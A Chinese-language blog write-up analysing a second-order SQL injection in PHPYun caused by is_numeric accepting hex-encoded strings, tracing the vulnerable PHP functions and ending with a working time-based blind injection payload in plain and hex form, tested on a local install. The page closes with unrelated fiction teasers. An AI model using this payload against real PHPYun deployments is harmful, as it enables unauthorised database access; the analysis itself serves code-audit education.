危险的is_numeric——PHPYun 2015-06-26 二次注入漏洞分析

今天分析是PHPYun的一个二次注入漏洞(漏洞详情)。

0x00 知识前提

  1. PHP提供了is_numeric函数,用来变量判断是否为数字。但是函数的范围比较广泛,不仅仅是十进制的数字。
<?php
echo is_numeric(233333);       # 1
echo is_numeric('233333');  # 1
echo is_numeric(0x233333);  # 1
echo is_numeric('0x233333');   # 1
echo is_numeric('233333abc');  # 0
?>
  1. MySQL数据库同样支持16进制,也就是HEX编码。虽然不像is_numeric函数一样有着比较强的容错性,但还是能够完成如下操作。
> insert into test (id, value) values (1, 0x74657374);
> select * from test;
| id | value |
| 1  | test  |

以上两点单独看起来都没什么问题,但如果遇到合适的场景,比如程序猿只是用is_numeric函数验证变量是否为数字,就很有可能插入一些特殊字符到数据库中。虽然<b>不能造成直接的SQL注入</b>,但危险的数据已经悄悄潜伏在了路边,就等你经过。

0x10 寻找可利用的is_numeric

我们现在已经知道了is_numeric是个危险的函数,全局搜索的结果有很多,我们进一步筛选一下:

  • 变量仅仅通过is_numeric判断是否为数字,没有经过Intval处理
  • 变量<b>插入/更新</b>数据库的时候没有加引号(二次注入,需要先引入数据)

经过人肉筛选之后,我们得到了一个函数:

# /app/public/action.class.php
function FormatValues($Values){
    $ValuesStr='';
    foreach($Values as $k=>$v){
        if(is_numeric($k)){
            $ValuesStr.=','.$v;
        }else{
            if(is_numeric($v)){
                $ValuesStr.=',`'.$k.'`='.$v;
            }else{
                $ValuesStr.=',`'.$k.'`=\''.$v.'\'';
            }
        }
    }
    return substr($ValuesStr,1);
}

这是个中间函数,我们搜一下哪里用到了这个函数。

QQ图片20150925113937.jpg

多个数据表模型都用到了这个函数,基本都是Update操作。现在的思路是利用接口将恶意代码Update进数据库,再通过其他接口,从数据库读恶意数据,在再次存到数据库的时候,进行注入。接下来的任务,是筛选能造成二次注入的点。

0x20 二次注入点

寻找二次注入的过程,是重复性的工作。根据全局搜索得出的多个模型,找到对应的控制层的代码,根据如下条件去筛选:

  • 恶意代码insert/update到数据库
  • 从数据库select数据,再将数据拼接到新的语句中(没有再次转义)

举个例子,ask.model.php中,出现了五次FormatValues。分别是:

  • UpdateAttention
  • UpdateQclass
  • UpdateAnswer
  • UpdateQuestion
  • SaveQuestion

搜索UpdateAttention:


QQ图片20151010202101.png

跟进函数:
![]YWWQOH}JNHENX4)]0((4OR.png](http://upload-images.jianshu.io/upload_images/939685-3f7d85f42ccc512e.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)

可以看到$type, 也就是写进attention表的type,是可用的。但是在数据库中查过之后,发现type的数据结构是int(11),太短,放弃。

再继续查,UpdateQclass,没有实际用到。继续,UpdateAnswer:

Q7A%XXP}L}10VKCH4K76@21.png

验证后,也没有可用的。用这种方法,逐个去排除,直到:

$2[Y@UCJ09R]IWE}1XX(AAQ.png

跟进函数:

function saveinfo_action(){
    if($_POST['submitBtn']){
        $M=$this->MODEL('friend');
        unset($_POST['submitBtn']);
        $nid=$M->SaveFriendInfo($_POST,array("uid"=>$this->uid));
        if($nid){
            $state_content = "我刚修改了个性签名<br>[".$_POST['description']."]。";
            $this->addstate($state_content);
            $M->member_log("修改朋友圈基本信息");
            $this->ACT_layer_msg("更新成功!",9,$_SERVER['HTTP_REFERER']);
        }else{
            $this->ACT_layer_msg("更新失败!",8,$_SERVER['HTTP_REFERER']);
        }
    }
}

再看一下friend_info表(从SaveFriendInfo()可以得到表名),nickname、description的数据结构都是varchar(100)。

终于找到了恶意代码插入点,接下来看看能不能利用。从DB层(friend.model.php)可以找到GetFriendInfo():

function GetFriendInfo($Where=array(),$Options=array()){
    $WhereStr=$this->FormatWhere($Where);
    $FormatOptions=$this->FormatOptions($Options);
    $row=$this->DB_select_once('friend_info',$WhereStr,$FormatOptions['field']);
    if($row['pic']==''){
        $row['pic']=$row['pic_big']=$this->config['sy_weburl'].'/'.$this->config['sy_friend_icon'];
    }else{
        $row['pic'] = str_replace("../",$this->config['sy_weburl']."/",$row['pic']);
        $row['pic_big'] = str_replace("../",$this->config['sy_weburl']."/",$row['pic_big']);
    }
    return $row;
}

从数据库读出来的数据,处理了一下pic参数,就返回了。搜索一下哪里用到了这个函数:

Paste_Image.png

逐个排除,定位到函数:

Paste_Image.png

跟进member_log函数:

function member_log($content,$opera='',$type=''){
    if($_COOKIE['uid']){
        $value="`uid`='".(int)$_COOKIE['uid']."',";
        $value.="`usertype`='".(int)$_COOKIE['usertype']."',";
        $value.="`content`='".$content."',";
        $value.="`opera`='".$opera."',";
        $value.="`type`='".$type."',";
        $value.="`ip`='".fun_ip_get()."',";
        $value.="`ctime`='".time()."'";
        $this->DB_insert_once("member_log",$value);
    }
}

跟进DB_insert_once函数:

function DB_insert_once($tablename, $value){
    $SQL = "INSERT INTO `" . $this->def . $tablename . "` SET ".$value;
    $this->db->query("set sql_mode=''");
    $this->db->query($SQL);
    $nid= $this->db->insert_id();
    return $nid;
}

成功找到注入点。

0x20 利用

  1. 先尝试通过hex编码写入测试信息,如图所示 。刷新后,成功写入!
    http://127.0.0.1/phpyun0625/friend/index.php?c=info

    AE49DB213E9045058ADCB1C68EE729DE.png

  2. 测试二次注入的接口,在DB_insert_once()打印SQL语句
    http://127.0.0.1/phpyun0625/ask/index.php?c=friend&a=atnuser
    POST: id=2
    返回结果如下:

INSERT INTO `phpyun_atn` SET `uid`='2',`sc_uid`='1',`usertype`='1',`sc_usertype`='1',`time`='1444726415'
INSERT INTO `phpyun_friend_state` SET `uid`='2',`content`='关注了<a href=\"http://127.0.0.1/phpyun0625/ask/index.php?c=friend&uid=1\">\'\"</a>',`type`='2',`ctime`='1444726415'
INSERT INTO `phpyun_sysmsg` SET `fa_uid`='1',`content`='用户 bb2 关注了你!',`username`='bb1',`ctime`='1444726415'
INSERT INTO `phpyun_member_log` SET `uid`='2',`usertype`='1',`content`='关注了'"',`opera`='',`type`='',`ip`='127.0.0.1',`ctime`='1444726415'
1

第四条SQL语句成功注入。

  1. 构造payload
    构造一个基于时间的盲注:
 ',ip=(select if(mid(user(),1,1)='r',sleep(5),0))#
0x20272c69703d2873656c656374206966286d6964287573657228292c312c31293d2772272c736c6565702835292c30292923

成功延时注入:


Paste_Image.png

0x30 总结

代码审计,有很多重复性的工作。拼的就是耐心和经验。这篇文章,算是手把手教如何审计二次注入漏洞了。之后会更多的关注PHP函数使用不当导致的漏洞,敬请期待。

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 人面猴
    序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 201,049评论 5 473
  • 死咒
    序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 84,478评论 2 377
  • 救了他两次的神仙让他今天三更去死
    文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 148,109评论 0 333
  • 道士缉凶录:失踪的卖姜人
    文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 54,097评论 1 272
  • 港岛之恋(遗憾婚礼)
    正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 63,115评论 5 363
  • 恶毒庶女顶嫁案:这布局不是一般人想出来的
    文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 48,280评论 1 279
  • 城市分裂传说
    那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 37,748评论 3 393
  • 双鸳鸯连环套:你想象不到人心有多黑
    文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 36,398评论 0 255
  • 万荣杀人案实录
    序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 40,553评论 1 295
  • 护林员之死
    正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 35,440评论 2 317
  • 白月光启示录
    正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 37,487评论 1 329
  • 活死人
    序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 33,176评论 3 317
  • 日本核电站爆炸内幕
    正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 38,750评论 3 303
  • 男人毒药:我在死后第九天来索命
    文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 29,821评论 0 19
  • 一桩弑父案,背后竟有这般阴谋
    文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 31,049评论 1 257
  • 情欲美人皮
    我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 42,559评论 2 348
  • 代替公主和亲
    正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 42,150评论 2 341

推荐阅读更多精彩内容